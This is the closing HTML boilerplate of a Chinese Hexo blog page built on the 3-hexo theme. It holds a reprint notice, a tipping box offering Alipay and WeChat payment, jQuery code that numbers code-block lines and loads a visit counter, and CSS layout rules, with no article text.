       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 jaytp@qq.com </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">赏</a>
</p>






    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2016-2020 Yelog
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        
        $('pre code').each(function(){
            var lines = $(this).text().trim().split('\n').length, widther='';
            if (lines>99) {
                widther = 'widther'
            }
            var $numbering = $('<ul/>').addClass('pre-numbering ' + widther).attr("unselectable","on");
            $(this).addClass('has-numbering ' + widther)
                    .parent()
                    .append($numbering);
            for(var i=1;i<=lines;i++){
                $numbering.append($('<li/>').text(i));
            }
        });
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<style>
    pre{
        position: relative;
        margin-bottom: 24px;
        border-radius: 10px;
        border: 1px solid #e2dede;
        background: #FFF;
        overflow: hidden;
    }
    code.has-numbering{
        margin-left: 30px;
    }
    code.has-numbering.widther{
        margin-left: 35px;
    }
    .pre-numbering{
        margin: 0;
        position: absolute;
        top: 0;
        left: 0;
        width: 20px;
        padding: 18px 3px 15px 5px;
        border-right: 1px solid #C3CCD0;
        text-align: right;
        color: #AAA;
        background-color: ;
    }
    .pre-numbering.widther {
        width: 35px;
    }
</style>

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
